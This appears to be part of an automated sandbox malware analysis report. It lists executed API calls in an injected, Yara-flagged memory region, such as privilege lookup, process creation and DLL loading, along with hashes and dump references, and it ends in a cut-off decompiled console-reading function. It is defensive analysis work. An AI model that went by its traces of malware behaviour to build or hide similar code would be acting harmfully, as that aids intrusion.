                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 34896197825efb41e9de508ff0dc76887f9d5e5493a86b6a8048be4e3ac56471
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 9CD01776200214ABD710EB99CC85EA77BADEF48760F164499BA5CAB242C530FA008AE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c55ac7f808b0a5adb73f94ab25036d3e0454bddc8b79a5d9dbb482b3ecf2e62b
                                  • Instruction ID: 6578435954a4d37e6b1ff1f1c149ba7c82c7b8c616c8f151063b691a8d8dea81
                                  • Opcode Fuzzy Hash: c55ac7f808b0a5adb73f94ab25036d3e0454bddc8b79a5d9dbb482b3ecf2e62b
                                  • Instruction Fuzzy Hash: 5E90027120104803D100A5D96608646000597E4341F51D015A5015559EC7E588917171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F978A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 99752bc49944cfe14dd05219bb4c14e687a5dcf8d9120b6f078dda81f96d94d2
                                  • Instruction ID: 6551e51ccb1e93b68305e0f8d0f15ca4170e3ee48ddc996b2ef8f93604726d10
                                  • Opcode Fuzzy Hash: 99752bc49944cfe14dd05219bb4c14e687a5dcf8d9120b6f078dda81f96d94d2
                                  • Instruction Fuzzy Hash: 8390027921304403D180B199660860A000597D5342F91D419A000655CCCBD588696361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F9FEA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 68a5c650961ea9f4799430096f21e973fada108623389a7304b68963176197ea
                                  • Instruction ID: de1168b3523a0588a1ea5808bf42f0b69bbcf0bcaface7089306f7f7c6eed090
                                  • Opcode Fuzzy Hash: 68a5c650961ea9f4799430096f21e973fada108623389a7304b68963176197ea
                                  • Instruction Fuzzy Hash: 5290027131118803D110A1999604706000597D5341F51C415A081555CD87D588917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F9A5A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: e1290a6e829f323e555c768a92581b3f6fe6bc53dcc4230d250a29af233dd8d8
                                  • Instruction ID: 47116835ef220158e67d6dd1ce416a2beaf999f16fa7b935f1f0d58df9fe5d9b
                                  • Opcode Fuzzy Hash: e1290a6e829f323e555c768a92581b3f6fe6bc53dcc4230d250a29af233dd8d8
                                  • Instruction Fuzzy Hash: 5990027121184443D200A5A95E14B07000597D4343F51C119A0145558CCBD588616561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F96DA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: ae2b7dbd8f5a509bf72da03d9ee8b26e13b795e3c416db3d05d31b4a359f2bed
                                  • Instruction ID: e159f41fca489539070bafe85ea16d5aee01bb0e1fd3e09e923202e1c28be618
                                  • Opcode Fuzzy Hash: ae2b7dbd8f5a509bf72da03d9ee8b26e13b795e3c416db3d05d31b4a359f2bed
                                  • Instruction Fuzzy Hash: 9590027120104C43D100A1995604B46000597E4341F51C01AA0115658D87D5C8517561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a1f270f94527db08c4e21ec3fe894350fd5a610db74938082f08e59a2bc09894
                                  • Instruction ID: e0c5d65d1d49562825371136d0e675fd50091788d75563966b09d87669df72d9
                                  • Opcode Fuzzy Hash: a1f270f94527db08c4e21ec3fe894350fd5a610db74938082f08e59a2bc09894
                                  • Instruction Fuzzy Hash: 5A9002712010CC03D110A199960474A000597D4341F55C415A441565CD87D588917161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F991A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 937c93d8163df6d1a33f300d83de82bed6fe07652a54971ef6f250ba8ed338e8
                                  • Instruction ID: af5c6243c444f727eeca016dbdd7b5665c07b1cfb8505566c8c2007bd612f647
                                  • Opcode Fuzzy Hash: 937c93d8163df6d1a33f300d83de82bed6fe07652a54971ef6f250ba8ed338e8
                                  • Instruction Fuzzy Hash: 9B9002B120104803D140B1995604746000597D4341F51C015A5055558E87D98DD576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F954A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 406e350ee7ca336a04a1de9d6a7a48e9ced30e7ed87c06cde6586aa75eddfb7b
                                  • Instruction ID: 85d914299cddb178fc74d6501d62b837f02aa1507be6747a439d19a3a597dbe4
                                  • Opcode Fuzzy Hash: 406e350ee7ca336a04a1de9d6a7a48e9ced30e7ed87c06cde6586aa75eddfb7b
                                  • Instruction Fuzzy Hash: 43900475311044030105F5DD17045070047D7DD3D1351C035F1007554CD7F1CC717171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f2fb800528c3349449342434f8933d805bea6641105e734a30ca5932e350157c
                                  • Instruction ID: 90f3d9caae9a9f2ec197aab6356441220d3d3cbf50162aa9a56db6ca3b8f99e3
                                  • Opcode Fuzzy Hash: f2fb800528c3349449342434f8933d805bea6641105e734a30ca5932e350157c
                                  • Instruction Fuzzy Hash: 9E9002B134104843D100A1995614B060005D7E5341F51C019E1055558D87D9CC527166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F95DA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 1153bd7f416d742bfc2e6fd5814f8f0290b2df3cb2769c00a4a11678251570bf
                                  • Instruction ID: 96bc08331267a761b1d246cba89e17458f717477bb822705b48bd2f605fa9402
                                  • Opcode Fuzzy Hash: 1153bd7f416d742bfc2e6fd5814f8f0290b2df3cb2769c00a4a11678251570bf
                                  • Instruction Fuzzy Hash: 449002B1202044034105B1995614616400A97E4341B51C025E1005594DC7E588917165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F984A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 363204a5428fef80da9c96fb5c1e81555fb80c83322795b9e144fc68d6789580
                                  • Instruction ID: 94a3f3c950ee9bd54bd78069cf3cf34d85344c718f1534b8a29ece7994b1cb03
                                  • Opcode Fuzzy Hash: 363204a5428fef80da9c96fb5c1e81555fb80c83322795b9e144fc68d6789580
                                  • Instruction Fuzzy Hash: F2900271242085535545F19956045074006A7E4381791C016A1405954C87E69856E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F986A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 64a1c98c966b2e803f5912c95d1d2027816dc22864e65e2999b77cc2d53572b1
                                  • Instruction ID: 5ddabb8e9fb5932209408a5da7a4ff520a8355265a39c8342b8b53fbe5fc2fbd
                                  • Opcode Fuzzy Hash: 64a1c98c966b2e803f5912c95d1d2027816dc22864e65e2999b77cc2d53572b1
                                  • Instruction Fuzzy Hash: D190027120104813D111A1995704707000997D4381F91C416A041555CD97D68952B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A053, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23AF8), ref: 02F3A08D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: a515e621f65c58bd63906f666a5c54ddc6f51f39bc6590ba87002ff4d4c51f07
                                  • Instruction ID: 27fac0c4d611a8c380cb1806b99a693ba782f142fb91e0e7542b24ad96b71835
                                  • Opcode Fuzzy Hash: a515e621f65c58bd63906f666a5c54ddc6f51f39bc6590ba87002ff4d4c51f07
                                  • Instruction Fuzzy Hash: E0E039B1200604BFDB19DF94CC55EA73B68AF88350F214659FA49A7251C631A8108BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23AF8), ref: 02F3A08D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: b5feaaa9a5165affa87c761a663079aff8063c3b9aeafc3874ad54c47ea402c0
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 49E012B1200208ABDB18EF99CC49EA777ADAF88750F028558BA586B241C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F282E9, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F2834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F2836B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 1faab6af18be43e9bdf9c8c51efa153e042905162ff4eccefb1f56c02b992cf6
                                  • Instruction ID: 2f210a6757bd6548a1a0f143fedc07005582ea8e2a281c21fc7785b6868e0cdf
                                  • Opcode Fuzzy Hash: 1faab6af18be43e9bdf9c8c51efa153e042905162ff4eccefb1f56c02b992cf6
                                  • Instruction Fuzzy Hash: 3601F531E802387BE721A6A49C02FBE766CAB41B90F040119FB04BA1C0E794690A47F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F282F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F2834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F2836B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: a73036d976ddb7a5e877130ccb6b3cb0943e5e934317315e651af634627752d0
                                  • Instruction ID: 24381cdb35770f05ef0c4da5b0aba8d03990ba925c55328e7cfcd25ed0766026
                                  • Opcode Fuzzy Hash: a73036d976ddb7a5e877130ccb6b3cb0943e5e934317315e651af634627752d0
                                  • Instruction Fuzzy Hash: 5501A231A802387BE721A6989D02FFF776CAB41F91F044119FF04BA1C1E694B90A4AF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F2ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(00000000,00000000,00000003,?), ref: 02F2AD42
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Dll.0000000E.00000002.501948723.0000000003090000.00000040.00000001Load
                                  • String ID:
                                  • API String ID: 2763747074-0
                                  • Opcode ID: b1471477da56fe6fa01915f3b9b923a9acddaf29160f3cbe089e92c2b2ffac69
                                  • Instruction ID: 9478dc99195da644f8a16424838c5d27cfdcb99e1e79910da3b06568287540a1
                                  • Opcode Fuzzy Hash: b1471477da56fe6fa01915f3b9b923a9acddaf29160f3cbe089e92c2b2ffac69
                                  • Instruction Fuzzy Hash: 2A0121B5D4020DABDF10EBE4DC41FDDB3B99B44748F004195EA09A7240F631E758CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A1F5, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F2F1A2,02F2F1A2,?,00000000,?,?), ref: 02F3A1F0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 0283c84fc84eabc0f1323511bccf766e7f84671cd3069cc7f818a62c13bb58be
                                  • Instruction ID: 22156e6e635abb166b7917dbf2e06cb94b4a0c6f2d368389f92e12540732e60e
                                  • Opcode Fuzzy Hash: 0283c84fc84eabc0f1323511bccf766e7f84671cd3069cc7f818a62c13bb58be
                                  • Instruction Fuzzy Hash: D6F0AFB2600204AFEB10EF55CC89FE77769EF88350F118594FE9D6B241C631E9108BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F3A124
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 9d9662612c159e869c588cf709c0d4ae2288f261e82695bccc86e2548ad4abe5
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 6B01B2B2210108BFCB54DF89DC90EEB77ADAF8C754F158258FA4DA7240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A1B2, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F2F1A2,02F2F1A2,?,00000000,?,?), ref: 02F3A1F0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 27dda4b72ee6236e50e6c26267661419b1c7366898f56e8ccf553db5edf6b476
                                  • Instruction ID: a6b3a1fbf72b5f779d3580227f692c6fd641dffc298891ddbada7e08d8464e26
                                  • Opcode Fuzzy Hash: 27dda4b72ee6236e50e6c26267661419b1c7366898f56e8ccf553db5edf6b476
                                  • Instruction Fuzzy Hash: A0F030B1240214AFDB10DF55DC95EEB37A99F85254F418154FE59AB282C531A8118BB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F2F1A2,02F2F1A2,?,00000000,?,?), ref: 02F3A1F0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: b355566299cc474784e64d39cb201dcfa9e3a327a0888040472fc54ce85e2c90
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: 68E01AB12002086BDB10DF49CC85EE737ADAF88750F018154BA4C67241C930E8108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F2F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02F28CF4,?), ref: 02F2F6CB
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 70f1f28c97589e84db1c6ce566cbf9b1083aedceb264ad8ba3bbf68dd4c9e35a
                                  • Instruction ID: 894cf829bee81e57e3d9d15d37b0a8e48487b751a655dfeffe681c1f24a86759
                                  • Opcode Fuzzy Hash: 70f1f28c97589e84db1c6ce566cbf9b1083aedceb264ad8ba3bbf68dd4c9e35a
                                  • Instruction Fuzzy Hash: DAD0A7717A03043BE610FBA49C07F2732CD9B45B45F490064FB49D73C3D950E0004565
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.0000000E.00000002.501948723.0000000003090000.00000040.00000001. ref: 030F9694
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501948723.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
                                  • Associated: 0000000E.00000002.502301043.00000000031AB000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001InitializeThunk.0000000
                                  • String ID:
                                  • API String ID: 362903329-0
                                  • Opcode ID: 473843f5bf6d9af26561aab551f06ee76b81aa9495969182bfbef2952d1991c1
                                  • Instruction ID: e14c13c2bc93c211807704cb606674cb5db06c2a2165b85b7284c830604e46a6
                                  • Opcode Fuzzy Hash: 473843f5bf6d9af26561aab551f06ee76b81aa9495969182bfbef2952d1991c1
                                  • Instruction Fuzzy Hash: 13B09B719024C5CAD651D7A157087177A447BD4741F16C055D2020685A47B8C091F5B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00173506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00173506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x193cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x197f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x197f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x17d0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x17d0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x17d0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E0017B4DD( *0x17d0d4 & 0x0000ffff);
							 *0x17d580 = 0;
							 *0x17d578 = 0;
							 *0x17d574 = 0;
							 *0x17d57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x197f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x197f20);
								_v68 =  *_v88;
								if( *0x17d544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
